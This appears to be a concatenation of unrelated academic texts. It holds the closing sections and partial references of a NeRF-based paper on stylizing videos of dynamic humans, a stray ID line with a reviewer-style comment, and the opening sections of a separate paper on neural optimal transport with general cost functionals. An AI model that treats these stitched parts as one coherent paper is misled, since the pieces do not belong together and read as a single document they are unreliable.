where $C_h(r)$ and $\tilde{C}_h(r)$ are the rendered and ground truth RGB values. More losses used to train the human NeRF can be found in the appendix.

After training the scene and human NeRFs for reconstruction, we discard the last fully connected layer. Then, the feature vectors and densities for sampled points are aggregated to render the pixel feature vector as introduced in the Composite NeRFs paragraph of Section 3.2. Finally, a decoder with convolutional and nonlinear layers converts the feature map into an RGB image. Here, two losses are applied, aiming to reconstruct the input video and also acquire semantic information for the feature patch $F_c$,

$$L_v = \|F_c - \tilde{F}_c\| + \sum_{l \in l_p} \|F^l(I) - F^l(\tilde{I})\| + \|I - \tilde{I}\|, \tag{5}$$

where $F_c$ and $\tilde{F}_c$ denote the rendered feature map and the feature extracted from the pretrained VGG network, $F^l(I)$ and $F^l(\tilde{I})$ are the VGG features of layer $l$ computed from the predicted and ground truth images, and $I$ and $\tilde{I}$ are the predicted and ground truth images. $l_p$ denotes the set of VGG layers.

Stylization. We use the content and style losses from AdaAttN (Liu et al., 2021), encompassing both global style and local feature losses. The former ensures a global stylized effect, and the latter generates better stylized output for local areas.

4 Experiments

Implementation. We train our model in two stages: video reconstruction and stylization. In the reconstruction stage, the model is trained to predict the input video frames. This facilitates the synthesis of novel views and further enables human animation. We apply the losses in Equation 3 and Equation 4 to minimize the view reconstruction error and learn human pose transformations between the observation and canonical spaces. Once the training of the scene and human NeRFs converges, we render the feature map of a sampled patch, which serves as the input to a 2D decoder that predicts the RGB values. Here, we freeze the density branch and the layers shared by the density and appearance branches. The subsequent layers are optimized using the losses in Equation 5. For the stylization stage, we utilize the content and style losses of AdaAttN as introduced in Section 3.5. We obtain a set of $N$ points using stratified sampling for both the scene and human NeRFs, where $N$ is set to 128. All layers are trained using Adam (Kingma & Ba, 2015). The learning rate for frame reconstruction starts at $1 \times 10^{-4}$ and decays exponentially over the course of training. The learning rate for the stylization stage is set to $2 \times 10^{-5}$.
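Both training stages rely on the per-ray feature rendering of Equation 1. A minimal, self-contained sketch (our own illustration with made-up shapes, not the authors' code) is:

```python
import torch

def render_ray_feature(sigma, delta, feats):
    """sigma: (N,) densities; delta: (N,) inter-sample distances; feats: (N, C)."""
    alpha = 1.0 - torch.exp(-sigma * delta)            # per-sample opacity
    trans = torch.cumprod(1.0 - alpha + 1e-10, dim=0)  # prod of exp(-sigma_j delta_j)
    trans = torch.cat([torch.ones(1), trans[:-1]])     # shift so T_i uses samples j < i
    w = trans * alpha                                  # w_i = T_i (1 - exp(-sigma_i delta_i))
    return (w.unsqueeze(-1) * feats).sum(dim=0)        # (C,) pixel feature f(r)

sigma = torch.rand(128)
delta = torch.full((128,), 0.02)
feats = torch.randn(128, 32)
f_pixel = render_ray_feature(sigma, delta, feats)      # stylized and decoded downstream
```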
Run time. Compared to the NeRF approaches that use MLPs to learn the feature representation of each sample point along the camera ray, the proposed tri-plane based representation significantly accelerates rendering, achieving a speedup of approximately 70% at inference time.

Datasets. We utilize two datasets of monocular videos, including NeuMan (Jiang et al., 2022) and a dataset captured with our smartphone. The first dataset comprises six videos with 40 to 104 frames. It includes indoor and outdoor scenes with diverse human subjects of various genders and races. However, this dataset presents two primary limitations. First, frames extracted from longer videos produce less fluid transitions across frames. Second, the limited number of frames makes it difficult to evaluate the robustness of the proposed method. To compensate for this, we capture two additional videos, emphasizing longer duration and more diverse scenes, with about 150-200 frames.

Figure 3: **Visual comparison with state-of-the-art methods.** The first two rows show the stylization results given the captured video frame as the input for 2D video stylization methods. The last row utilizes the animated human generated by our method as the input. All results demonstrate the efficacy of the proposed method in generating the patterns and textures of the style images.

Figure 4: **Examples of novel view synthesis and animation.** The first two rows show the novel view results around the human by moving the camera from right to left. The third row visualizes the stylized human given different poses.

### 4.1 Qualitative Results

**Comparison with state-of-the-art stylization methods.** We present a visual comparison with the state-of-the-art 2D video stylization methods LST (Li et al., 2019), AdaAttN (Liu et al., 2021), and CCPL (Wu et al., 2022) in Figure 3. It can be seen that the proposed method achieves better stylization on different subjects, as depicted in the 1st and 2nd rows. Our method can produce stylization with textures and patterns much more similar to the style images. In contrast, LST (Li et al., 2019) and AdaAttN (Liu et al., 2021) transfer fewer textures from the style image. Both LST (Li et al., 2019) and CCPL (Wu et al., 2022) generate blurry stylized images and exhibit more artifacts, particularly on the human and the ground, as seen in the 1st row.

**Novel view synthesis and animation.** Unlike existing video stylization methods that perform stylization on the input view, our model is capable of stylizing images from novel views and novel poses, which benefits from the utilization of human and scene NeRFs. Once our model is adequately trained, it can seamlessly synthesize novel views and animate humans during inference. Visual examples can be found in Figure 4.

Table 2: **Temporal consistency compared with 2D video stylization methods.** Consistency is calculated by the warping error (↓). The best and second best performances are in red and blue colors.

| Models | LST [CVPR2019] | AdaAttN [ICCV2021] | CCPL [ECCV2022] | Ours |
|--------------|----------------|--------------------|-----------------|------|
| Our dataset | 0.169 | 0.161 | 0.231 | 0.165|
| NeuMan | 0.226 | 0.239 | 0.298 | 0.214|

Table 3: **Temporal consistency compared with 2D video stylization methods on novel views and animated humans.** The inputs of all methods are generated by the proposed method. Consistency is calculated by the warping error (↓). The best and second best performances are in red and blue colors.
| LST[CVPR2019] | AdaAttN[ICCV2021] | IEContraAST[NeurIPS2021] | CSBNet[IJCAI2022] | CCPL[ECCV2022] | Ours |
|---------------|--------------------|---------------------------|-------------------|----------------|------|
| 0.159 | 0.152 | 0.269 | 0.247 | 0.239 | 0.143|

Table 4: **Quantitative results on temporal consistency (lower is better).** The proposed method, designed for dynamic scenes, achieves much better performance compared to StyleRF.

| | Our dataset | NeuMan |
|----------------------|-------------|--------|
| StyleRF / Ours | 0.293 / 0.165 | 0.387 / 0.214 |

Figure 5: **User study on the original video space.** We present videos produced by two methods each time, and ask each volunteer to select the one with less flickering (consistency) and a better balance of temporal coherence and style quality (overall performance).

Figure 6: **User study on novel views and animated humans.** We present videos produced by two methods each time, and ask each volunteer to select the one with less flickering (consistency) and a better balance of temporal coherence and style quality (overall performance). The inputs of all methods are predicted by the proposed method.

### 4.2 Quantitative Results

**Consistency evaluation.** To quantify the consistency across frames, following (Liu et al., 2023), we leverage the optical flow, warp one frame to the subsequent one, and then compute the masked LPIPS score (Zhang et al., 2018). The consistency scores are obtained by comparing adjacent views and far-away views, respectively. The average results of these comparisons are presented in Table 2, Table 3 and Table 4. We compare the proposed method against state-of-the-art video stylization methods including LST (Li et al., 2019), AdaAttN (Liu et al., 2021), IEContraAST (Chen et al., 2021a), CSBNet (Lu & Wang, 2022), CCPL (Wu et al., 2022) and one NeRF-based multi-view method, StyleRF (Liu et al., 2023). Compared to the 2D video stylization methods, our method shows better consistency, which benefits from the consistent geometry learned by NeRF. The proposed method, designed for dynamic scenes, achieves much better performance than StyleRF.

**User study.** We conduct a user study to gain deeper insights into the perceptual quality of the stylized images produced by our method in comparison to the baseline methods. Our study is organized into two sections: temporal consistency and overall synthesis quality. We visualize the results in Figure 5 and Figure 6 with approximately 3000 votes and 5000 votes, respectively.

Table 5: **Ablation study with video stylization methods on temporal consistency.** By replacing the input of the 2D stylization methods with the images rendered by our method, we demonstrate that our unified framework generates better results than the combination of NeRFs and 2D stylization methods. The best and second best performances are in red and blue colors.
| Models | LST [CVPR2019] | AdaAttN [ICCV2021] | CCPL [ECCV2022] | Ours |
|--------------|----------------|--------------------|----------------|------|
| Our dataset | 0.185 | 0.179 | 0.261 | 0.165|
| NeuMan | 0.248 | 0.267 | 0.321 | 0.214|

Table 6: **Ablation study with the vanilla tri-plane (Fridovich-Keil et al., 2023) on temporal consistency (lower is better).** The proposed geometry-guided tri-plane encoded by U-Nets achieves better consistency than directly optimizing the features of the tri-plane (Fridovich-Keil et al., 2023).

| Tri-plane (Fridovich-Keil et al., 2023) | Ours |
|----------------------------------------|------|
| 0.207 | 0.182 |

Figure 5 shows results on the original 2D videos and Figure 6 shows results on novel views and animated humans generated by the proposed method. On the original video space (Figure 5), our method outperforms the baseline methods in terms of overall synthesis quality, which underscores the efficacy of our method in striking a delicate balance between temporal coherence and stylization quality. On the novel views and animated humans (Figure 6), our method shows superior performance on all metrics, which demonstrates the efficacy of the proposed unified framework. More details can be found in the supplementary material.

### 4.3 Ablation Studies

In this work, we propose to address style transfer, novel view synthesis and human animation within a unified framework. An alternative approach could employ an existing dynamic NeRF-based method to predict animated humans and novel views in a scene, followed by applying existing 2D video stylization methods. Here, we render frames with animated humans utilizing our first-stage method and then apply the rendered frames as the input to video stylization methods. The visual comparison is illustrated in the last row of Figure 3. As observed, our method paints the scene in the desired style while preserving the structure of the content image. Quantitative results can be found in Table 5, which demonstrates the advantages of our proposed unified framework.

In addition, to demonstrate the efficacy of the proposed geometry-guided tri-plane, we show quantitative results in Table 6. It can be seen that the proposed geometry-guided tri-plane generates better consistency than the vanilla tri-plane (Fridovich-Keil et al., 2023), which demonstrates the advantage of using U-Nets to encode the tri-plane features over directly optimizing them as in (Fridovich-Keil et al., 2023). Visual results can be found in the supplementary material.

### 5 Conclusion

Our work looks into the problem of video stylization, with particular emphasis on dynamic humans. Going beyond existing video stylization, we have proposed a unified framework for 3D-consistent video stylization which also supports flexible manipulation of viewpoints and body poses of humans. To accomplish this, we incorporate the NeRF representation to encode both the human subject and its surroundings and conduct stylization on the rendered features from NeRF. Specifically, a geometry-guided tri-plane representation is introduced to learn the 3D scene in a more efficient and effective manner. With extensive evaluations, we have demonstrated superior performance on stylized textures and long-term 3D consistency, together with the unique capability of stylizing novel views and animated humans.
**Limitations and future directions.** First, our current approach is constrained by the limited variation in camera pose and human face angles within the input video, restricting novel views to smaller angles. Future research can explore generative techniques to extrapolate unseen backgrounds and human features, enabling the creation of more expansive novel views. Second, while our current implementation has been optimized for speed, it still falls short of supporting real-time manipulation. One potential avenue for improvement is to pre-render stylized features and then reuse them across different views and various human poses to enhance real-time performance. Third, our method achieves the best trade-off between stylization and consistency. A future research direction could focus on achieving the utmost stylization effect without compromising consistency or style quality.

REFERENCES

Dongdong Chen, Jing Liao, Lu Yuan, Nenghai Yu, and Gang Hua. Coherent online video style transfer. In IEEE International Conference on Computer Vision, 2017.

Haibo Chen, Zhizhong Wang, Huiming Zhang, Zhiwen Zuo, Ailin Li, Wei Xing, Dongming Lu, et al. Artistic style transfer with internal-external learning and contrastive learning. Advances in Neural Information Processing Systems, 34:26561–26573, 2021a.

Jianchuan Chen, Ying Zhang, Di Kang, Xuefei Zhe, Linchao Bao, Xu Jia, and Huchuan Lu. Animatable Neural Radiance Fields from Monocular RGB Videos. arXiv preprint arXiv:2106.13629, 2021b.

Pei-Ze Chiang, Meng-Shiun Tsai, Hung-Yu Tseng, Wei-Sheng Lai, and Wei-Chen Chiu. Stylizing 3D scene via implicit representation and hypernetwork. In IEEE Conference on Computer Vision and Pattern Recognition, 2022.

Yingying Deng, Fan Tang, Weiming Dong, Haibin Huang, Chongyang Ma, and Changsheng Xu. Arbitrary video style transfer via multi-channel correlation. In Association for the Advancement of Artificial Intelligence, 2021.

Sara Fridovich-Keil, Giacomo Meanti, Frederik Rahbæk Warburg, Benjamin Recht, and Angjoo Kanazawa. K-planes: Explicit radiance fields in space, time, and appearance. In IEEE Conference on Computer Vision and Pattern Recognition, 2023.

Leon A Gatys, Alexander S Ecker, and Matthias Bethge. Image style transfer using convolutional neural networks. In IEEE Conference on Computer Vision and Pattern Recognition, 2016.

Haozhi Huang, Hao Wang, Wenhan Luo, Lin Ma, Wenhao Jiang, Xiaolong Zhu, Zhifeng Li, and Wei Liu. Real-time neural style transfer for videos. In IEEE Conference on Computer Vision and Pattern Recognition, 2017.

Xun Huang and Serge Belongie. Arbitrary style transfer in real-time with adaptive instance normalization. In IEEE International Conference on Computer Vision, 2017.

Yi-Hua Huang, Yue He, Yu-Jie Yuan, Yu-Kun Lai, and Lin Gao. StylizedNeRF: Consistent 3D scene stylization as stylized NeRF via 2D-3D mutual learning. In IEEE Conference on Computer Vision and Pattern Recognition, 2022.

Wei Jiang, Kwang Moo Yi, Golnoosh Samei, Oncel Tuzel, and Anurag Ranjan. NeuMan: Neural human radiance field from a single video. In European Conference on Computer Vision, 2022.

Diederik P Kingma and Jimmy Ba. Adam: A method for stochastic optimization. In International Conference on Learning Representations, 2015.

Xueting Li, Sifei Liu, Jan Kautz, and Ming-Hsuan Yang. Learning linear transformations for fast image and video style transfer. In IEEE Conference on Computer Vision and Pattern Recognition, 2019.

Kunhao Liu, Fangneng Zhan, Yiwen Chen, Jiahui Zhang, Yingchen Yu, Abdulmotaleb El Saddik, Shijian Lu, and Eric P Xing.
StyleRF: Zero-shot 3D Style Transfer of Neural Radiance Fields. In IEEE Conference on Computer Vision and Pattern Recognition, 2023.

Songhua Liu, Tianwei Lin, Dongliang He, Fu Li, Meiling Wang, Xin Li, Zhengxing Sun, Qian Li, and Errui Ding. AdaAttN: Revisit attention mechanism in arbitrary neural style transfer. In IEEE International Conference on Computer Vision, 2021.

Matthew Loper, Naureen Mahmood, Javier Romero, Gerard Pons-Moll, and Michael J Black. SMPL: A skinned multi-person linear model. ACM Transactions on Graphics, 34(6):1–16, 2015.

Haofei Lu and Zhizhong Wang. Universal video style transfer via crystallization, separation, and blending. In International Joint Conference on Artificial Intelligence, pp. 23–29, 2022.
gIiz7tBtYZ
Another point is that the cost function proposed in Prop. 1 contains a quadruple sum over samples: a discussion of its variance would be welcome. Also, the proposition mentions that it is an estimator: in which sense?
Neural Optimal Transport with General Cost Functionals

Arip Asadulaev∗1,3 Alexander Korotin∗2,1 Vage Egiazarian4,5 Petr Mokrov2 Evgeny Burnaev2,1

1 Artificial Intelligence Research Institute 2 Skolkovo Institute of Science and Technology 3 Moscow Institute of Physics and Technology 4 HSE University 5 Yandex

[email protected], [email protected]

Abstract

We introduce a novel neural network-based algorithm to compute optimal transport (OT) plans for general cost functionals. In contrast to common Euclidean costs, i.e., \( \ell^1 \) or \( \ell^2 \), such functionals provide more flexibility and allow using auxiliary information, such as class labels, to construct the required transport map. Existing methods for general cost functionals are discrete and do not provide out-of-sample estimation. We address the challenge of designing a continuous OT approach for general cost functionals in high-dimensional spaces, such as images. We construct two example functionals: one to map distributions while preserving the class-wise structure and the other to preserve the given data pairs. Additionally, we provide a theoretical error analysis for our recovered transport plans. Our implementation is available at https://github.com/machinestein/gnot.

Figure 1: Results of our method with the pair-guided cost functional (§6.2) applied to the supervised image-to-image translation task (Celeba-MaskHQ dataset, 256 × 256 images).

1 Introduction

Optimal transport (OT) is a powerful framework to solve mass-moving problems for data distributions, which finds many applications in machine learning and computer vision (Bonneel & Digne, 2023). Most existing methods to compute OT plans are designed for discrete distributions (Flamary et al., 2021; Cuturi, 2013). These methods have good flexibility and allow to control the properties of the plan (Peyré et al., 2019). However, discrete methods find an optimal matching between two given (train) sets, which does not generalize to new (test) data points. This limits the use of discrete OT plan methods in scenarios where new data needs to be generated, e.g., image-to-image transfer (Zhu et al., 2017).

∗Equal contribution.

Recent works (Rout et al., 2022; Korotin et al., 2023b, 2021b; Fan et al., 2023; Daniels et al., 2021) propose continuous methods to compute OT plans. Thanks to employing neural networks to parameterize OT solutions, the learned transport plan can be used directly as the generative model in data synthesis (Rout et al., 2022) and unpaired learning (Korotin et al., 2023b; Rout et al., 2022; Daniels et al., 2021; Gazdieva et al., 2022). Existing continuous OT methods mostly focus on classic cost functions such as \( \ell^2 \) (Korotin et al., 2021b, 2023b; Fan et al., 2023; Gazdieva et al., 2022), which estimate the closeness of input and output points. However, choosing such costs for problems where a specific optimality of the mapping is required may be challenging. For example, when one needs to preserve the object class during the transport (Figure 2), the common \( \ell^2 \) cost may be suboptimal (Su et al., 2022, Appendix C; Daniels et al., 2021, Figure 3). This limitation can be fixed by considering general cost functionals (Paty & Cuturi, 2020), which may take into account additional information, e.g., class labels. Despite the large popularity of OT, a continuous approach for OT with general cost functionals (general OT) is still missing. We address this limitation.

The main contributions of our paper are:
1. We show that the general OT problem (§2) can be reformulated as a saddle point optimization problem, which allows to implicitly recover the OT plan (§4.1) in the continuous setting. The problem can be solved with neural networks and stochastic gradient methods (Algorithm 2).

2. We provide an error analysis of solving the proposed saddle point optimization problem via the duality gaps, i.e., the errors of solving the inner and outer optimization problems (§4.2).

3. We construct and test examples of general cost functionals for mapping data distributions while preserving the class-wise structure (§5.1, Algorithm 1) and the paired data structure (§5.2, Algorithm 3).

From the theoretical perspective, our max-min reformulation is generic and subsumes previously known reformulations for classic (Rout et al., 2022; Fan et al., 2023) and weak (Korotin et al., 2021b) OT. Furthermore, existing error analysis works exclusively with the classic OT and operates only under certain restrictive assumptions such as the convexity of the dual potential. Satisfying these assumptions in practice leads to a severe performance drop (Korotin et al., 2021c, Figure 5a). In contrast, our error analysis is free from assumptions on the dual variable and, besides general OT, is applicable to weak OT, for which there is currently no existing error analysis.

From the practical perspective, we apply our method to the dataset transfer problem (Figure 2), previously not solved using continuous optimal transport. This problem arises when it is necessary to repurpose fixed or black-box models to classify previously unseen, partially labelled target datasets with high accuracy by mapping the data into the dataset on which the classifier was trained (Alvarez Melis & Fusi, 2021). Our method achieves notable improvements in accuracy over existing algorithms. Also, we show the performance of our method on the supervised image-to-image translation task.

Notations. For a compact Hausdorff space \( S \), we use \( P(S) \) to denote the set of Borel probability distributions on \( S \). We denote the space of continuous \( \mathbb{R} \)-valued functions on \( S \) endowed with the supremum norm by \( C(S) \). Its dual space is the space \( M(S) \supseteq P(S) \) of finite signed Borel measures over \( S \). Let \( X, Y \) be compact Hausdorff spaces and \( P \in P(X), Q \in P(Y) \). We use \( \Pi(P) \subset P(X \times Y) \) to denote the subset of probability distributions on \( X \times Y \) whose projection onto the first marginal is \( P \). We use \( \Pi(P,Q) \subset \Pi(P) \) to denote the subset of probability distributions (transport plans) on \( X \times Y \) with marginals \( P, Q \). For a measurable map \( T : X \times Z \rightarrow Y \), we denote the associated push-forward operator by \( T_\# \).

2 BACKGROUND

In this section, we provide the key concepts of optimal transport theory. Throughout the paper, we consider compact \( X = Y \subset \mathbb{R}^D \) and \( P \in P(X), Q \in P(Y) \).

Classic and weak OT. For a cost function \( c \in C(X \times Y) \), the OT cost between \( P, Q \) is

\[ \text{Cost}(P, Q) \overset{\text{def}}{=} \inf_{\pi \in \Pi(P,Q)} \int_{X \times Y} c(x,y) \, d\pi(x,y), \tag{1} \]

see (Villani, 2008, §1). We call (1) the classic OT. Problem (1) admits a minimizer \( \pi^* \in \Pi(P,Q) \), which is called an OT plan (Santambrogio, 2015, Theorem 1.4). It may not be unique (Peyré et al., 2019, Remark 2.3).
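As a toy illustration (our own example, not from the paper): for \( P = \frac{1}{2}\delta_{x_1} + \frac{1}{2}\delta_{x_2} \) and \( Q = \frac{1}{2}\delta_{y_1} + \frac{1}{2}\delta_{y_2} \), a plan \( \pi \in \Pi(P, Q) \) is a \( 2 \times 2 \) matrix with all row and column sums equal to \( \frac{1}{2} \), and (1) becomes

\[ \text{Cost}(P, Q) = \min_{\pi} \sum_{i,j} c(x_i, y_j)\, \pi_{ij}, \]

so, since the objective is linear in \( \pi \), the optimizer is attained at an extreme point: it simply picks the cheaper of the two deterministic matchings \( \{x_1 \to y_1, x_2 \to y_2\} \) and \( \{x_1 \to y_2, x_2 \to y_1\} \) (or any mixture of them if their total costs are equal).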
Intuitively, the cost function \( c(x,y) \) measures how hard it is to move a mass piece between points \( x \in X \) and \( y \in Y \). That is, \( \pi^* \) shows how to optimally distribute the mass of \( P \) to \( Q \), i.e., with minimal effort. For cost functions \( c(x,y) = \|x - y\|_2 \) and \( c(x,y) = \frac{1}{2} \|x - y\|_2^2 \), the OT cost (1) is called the Wasserstein-1 (\(W_1\)) and the (square of the) Wasserstein-2 (\(W_2\)) distance, respectively; see (Villani, 2008, §1) or (Santambrogio, 2015, §1-2).

Recently, classic OT obtained the weak OT extension (Gozlan et al., 2017; Backhoff-Veraguas et al., 2019). Consider \( C : X \times P(Y) \to \mathbb{R} \), i.e., a weak cost function whose inputs are a point \( x \in X \) and a distribution of \( y \in Y \). The weak OT cost is

$$\text{Cost}(P, Q) \overset{\text{def}}{=} \inf_{\pi \in \Pi(P, Q)} \int_X C(x, \pi(\cdot | x)) \, dP(x), \tag{2}$$

where \( \pi(\cdot | x) \) denotes the conditional distribution. The weak formulation (2) reduces to the classic formulation (1) when \( C(x, \mu) = \int_Y c(x, y) d\mu(y) \). Another example of a weak cost function is the \( \gamma \)-weak quadratic cost \( C(x, \mu) = \int_Y \frac{1}{2} \|x - y\|_2^2 d\mu(y) - \frac{\gamma}{2} \text{Var}(\mu) \), where \( \gamma \geq 0 \) and \( \text{Var}(\mu) \) is the variance of \( \mu \); see (Korotin et al., 2023b, Eq. 5; Alibert et al., 2019, §5.2; Gozlan & Juillet, 2020, §5.2) for details. For this cost, we denote the optimal value of (2) by \( W_{2,\gamma} \) and call it the \( \gamma \)-weak Wasserstein-2.

Regularized and general OT. The expression inside (1) is a linear functional. It is common to add a lower semi-continuous convex regularizer \( R : M(X \times Y) \to \mathbb{R} \cup \{\infty\} \) with weight \( \gamma > 0 \):

$$\text{Cost}(P, Q) \overset{\text{def}}{=} \inf_{\pi \in \Pi(P, Q)} \left\{ \int_{X \times Y} c(x, y) d\pi(x, y) + \gamma R(\pi) \right\}. \tag{3}$$

The regularized OT formulation (3) typically provides several advantages over the original formulation (1). For example, if \( R(\pi) \) is strictly convex, the expression inside (3) is a strictly convex functional in \( \pi \) and yields the unique OT plan \( \pi^* \). Besides, regularized OT typically has better sample complexity (Genevay, 2019; Mena & Niles-Weed, 2019; Genevay et al., 2019). Common regularizers are the entropic (Cuturi, 2013), quadratic (Essid & Solomon, 2018), lasso (Courty et al., 2016), etc.

To consider a general OT formulation, let \( F : M(X \times Y) \to \mathbb{R} \cup \{+\infty\} \) be a convex lower semi-continuous functional. Assume that there exists \( \pi \in \Pi(P, Q) \) for which \( F(\pi) < \infty \). Let

$$\text{Cost}(P, Q) \overset{\text{def}}{=} \inf_{\pi \in \Pi(P, Q)} F(\pi). \tag{4}$$

This problem is a generalization of classic OT (1), weak OT (2), and regularized OT (3). Following Paty & Cuturi (2020), we call problem (4) a general OT problem. It admits a minimizer (OT plan) \( \pi^* \) (Paty & Cuturi, 2020, Lemma 1). One may note that regularized OT (3) represents a similar problem: it is enough to put \( c(x, y) \equiv 0 \), \( \gamma = 1 \) and \( R(\pi) = F(\pi) \) to obtain (4) from (3), i.e., regularized (3) and general OT (4) can be viewed as equivalent formulations.

### 3 RELATED WORK: DISCRETE AND CONTINUOUS OT SOLVERS

Solving OT problems usually implies either finding an OT plan \( \pi^* \) or the OT cost. Many approaches in generative learning use the OT cost as the loss function to update generative models, such as WGANs (Arjovsky & Bottou, 2017; Petzka et al., 2018; Liu et al., 2019); see (Korotin et al., 2022b) for a survey.
These are not related to our work as they do not compute OT plans or maps. Existing computational OT plan methods can be roughly split into two groups: discrete and continuous.

**Discrete OT** considers discrete distributions \( \hat{P}_N = \sum_{n=1}^{N} p_n \delta_{x_n} \) and \( \hat{Q}_M = \sum_{m=1}^{M} q_m \delta_{y_m} \) and aims to find the OT plan (1), (2), (3), (4) directly between \( P = \hat{P}_N \) and \( Q = \hat{Q}_M \). In this case, the OT plan \( \pi^* \) can be represented as a doubly stochastic \( N \times M \) matrix. For a survey of computational methods for discrete OT, we refer to (Peyré et al., 2019). In short, one of the most popular is the Sinkhorn algorithm (Cuturi, 2013), which is designed to solve formulation (3) with the entropic regularization. General discrete OT is extensively studied (Nash, 2000; Courty et al., 2016; Flamary et al., 2021; Ferradans et al., 2014; Rakotomamonjy et al., 2015); these methods are often employed in domain adaptation problems (Courty et al., 2016). Additionally, the available labels can be used to reconstruct the classic cost function to capture the underlying data structure (Courty et al., 2016; Stuart & Wolfram, 2020; Liu et al., 2020; Li et al., 2019). The major drawback of discrete OT methods is that they only perform a (stochastic) matching between the given empirical samples and usually do not provide out-of-sample estimates. This limits their application to real-world scenarios where new (test) samples frequently appear. Recent works (Hütter & Rigollet, 2021; Pooladian & Niles-Weed, 2021; Manole et al., 2021; Deb et al., 2021) consider the OT problem with the quadratic cost and develop out-of-sample estimators via wavelet/kernel-based plugin estimators or via the barycentric projection of the discrete entropic OT plan. In spite of tractable theoretical properties, the performance of such methods in high dimensions is questionable.

**Continuous OT** usually considers \( p_n = \frac{1}{N} \) and \( q_m = \frac{1}{M} \) and assumes that the given discrete distributions \( \hat{P}_N = \frac{1}{N} \sum_{n=1}^{N} \delta_{x_n} \), \( \hat{Q}_M = \frac{1}{M} \sum_{m=1}^{M} \delta_{y_m} \) are the empirical counterparts of the underlying distributions \( P, Q \). That is, the goal of continuous OT is to recover the OT plan between \( P, Q \), which are accessible only through their (finite) empirical samples \( \{x_1, x_2, \ldots, x_N\} \sim P \) and \( \{y_1, y_2, \ldots, y_M\} \sim Q \). In this case, to represent the plan, one has to employ parametric approximations of the OT plan \( \pi^* \) or the dual potentials \( u^*, v^* \), which, in turn, provide straightforward out-of-sample estimates. A notable development is the use of neural networks to compute OT maps for solving weak (2) and classic (1) functionals (Korotin et al., 2023b; 2022a; 2021b; Rout et al., 2022; Fan et al., 2023; Henry-Labordere, 2019). Previous OT methods were based on formulations restricted to convex potentials (Makkuva et al., 2020; Korotin et al., 2021a,c; Mokrov et al., 2021; Fan et al., 2023; Bunne et al., 2021; Alvarez-Melis et al., 2022), and used Input Convex Neural Networks (ICNNs) to approximate them, which limited the application of OT in large-scale tasks (Korotin et al., 2021b; Fan et al., 2022; Korotin et al., 2022a). In (Genevay et al., 2016; Seguy et al., 2018; Daniels et al., 2021; Fan et al., 2022), the authors propose methods for \( f \)-divergence regularized costs (3).
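To make the out-of-sample limitation concrete, here is a small illustration (ours) using the POT library, assuming `pip install pot`: the discrete entropic plan is just an \( N \times M \) matrix over the given samples, so a new test point has no row in it.

```python
import numpy as np
import ot  # POT: Python Optimal Transport

N, M, D = 64, 64, 2
x = np.random.randn(N, D)              # train samples from P
y = np.random.randn(M, D) + 2.0        # train samples from Q
a = np.full(N, 1.0 / N)                # uniform marginals p_n
b = np.full(M, 1.0 / M)                # uniform marginals q_m
C = ot.dist(x, y)                      # squared Euclidean cost matrix
pi = ot.sinkhorn(a, b, C, reg=0.05)    # doubly stochastic N x M entropic plan
print(pi.shape)                        # (64, 64); no mapping for an unseen x_test
```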
While the **discrete** version of the general OT problem (4) is well studied in the literature, its continuous counterpart has not yet been analyzed. In our work, we fill this gap by proposing an algorithm to solve the (continuous) **general** OT problem (4) and providing error bounds (§4.2). As an illustration, we construct examples of general cost functionals which can take into account available task-specific information, such as labels (§5.1) or pairs (§5.2).

### 4 Maximin Reformulation of the General OT

In this section, we derive a saddle point formulation for the general OT problem (4) which we later solve with neural networks. All the proofs of the statements are given in Appendix A.

#### 4.1 General OT Maximin Reformulation via Stochastic Maps

In this subsection, we derive the dual form of (4), which can be used to get the OT plan \( \pi^* \). Our formulation utilizes the implicit representation of plans \( \Pi(P) \) via stochastic maps, an idea inspired by (Korotin et al., 2023b, §4.1). We introduce a latent space \( Z = \mathbb{R}^Z \) and an atomless distribution \( S \in \mathcal{P}(Z) \) on it, e.g., \( S = N(0, I_Z) \). For every \( \pi \in \mathcal{P}(X \times Y) \), there exists a measurable function \( T = T_\pi : X \times Z \to Y \) which implicitly represents it. Such \( T_\pi \) satisfies \( T_\pi(x, \cdot) \sharp S = \pi(\cdot | x) \) for all \( x \in X \). That is, given \( x \in X \) and a random latent vector \( z \sim S \), the function \( T \) produces a sample \( T_\pi(x, z) \sim \pi(y | x) \). In particular, if \( x \sim P \), the random vector \( [x, T_\pi(x, z)] \) is distributed as \( \pi \). Thus, every \( \pi \in \Pi(P) \) can be implicitly represented (non-uniquely) as a function \( T_\pi : X \times Z \to Y \). And vice versa, every measurable function \( T : X \times Z \to Y \) is an implicit representation of the distribution \( \pi_T \), which is the joint distribution of a random vector \( [x, T(x, z)] \) with \( x \sim P, z \sim S \).

Our two following theorems constitute the main theoretical idea of our approach. They are proven for separably *-increasing functionals \( F \) (see the definition in Appendix A). Note that one can eliminate this restriction by taking advantage of minimax theorems (Terkelsen, 1972).

**Theorem 1** (Maximin reformulation of the general OT). For a separably *-increasing, convex and lower semi-continuous functional \( F : \mathcal{M}(X \times Y) \to \mathbb{R} \cup \{+\infty\} \) it holds (we identify \( \tilde{F}(T) \overset{\text{def}}{=} F(\pi_T) \)):

$$\text{Cost}(P, Q) = \sup_v \inf_T L(v, T) \overset{\text{def}}{=} \sup_v \inf_T \left\{ \tilde{F}(T) - \int_{X \times Z} v(T(x, z)) \, dP(x) \, dS(z) + \int_Y v(y) \, dQ(y) \right\}, \tag{5}$$

where the sup is taken over potentials \( v \in C(Y) \) and the inf over measurable functions \( T : X \times Z \to Y \).

From (5) we also see that it is enough to consider values of \( F \) at \( \pi_T \in \Pi(P) \). By convention, in further derivations we always set \( \tilde{F}(T_\pi) = F(\pi) = +\infty \) for \( \pi \in \mathcal{M}(X \times Y) \setminus \Pi(P) \).

We say that \( T^* \) is a **stochastic OT map** if it represents some OT plan \( \pi^* \) solving (4), i.e., \( T^*(x, \cdot) \sharp S = \pi^*(\cdot | x) \) holds \( P \)-almost surely for all \( x \in X \).

**Theorem 2** (Optimal saddle points provide stochastic OT maps). Let \( v^* \in \arg \sup_v \inf_T L(v, T) \) be any optimal potential. Then for every stochastic OT map \( T^* \) it holds:

$$T^* \in \arg \inf_T L(v^*, T).$$
Furthermore, if \( F \) is strictly convex in \( \pi \), then (4) admits a unique OT plan \( \pi^* \). In this case, \( T^* \in \arg\inf_T L(v^*, T) \iff T^* \) is a stochastic OT map.

From our results it follows that by solving (5) and obtaining an optimal saddle point \((v^*, T^*)\), one gets a stochastic OT map \( T^* \). To ensure that all the solutions are OT maps, one may consider adding strictly convex regularizers to \( F \) with a small weight, e.g., the conditional interaction energy, also known as the conditional kernel variance (Korotin et al., 2023a); see Appendix D.

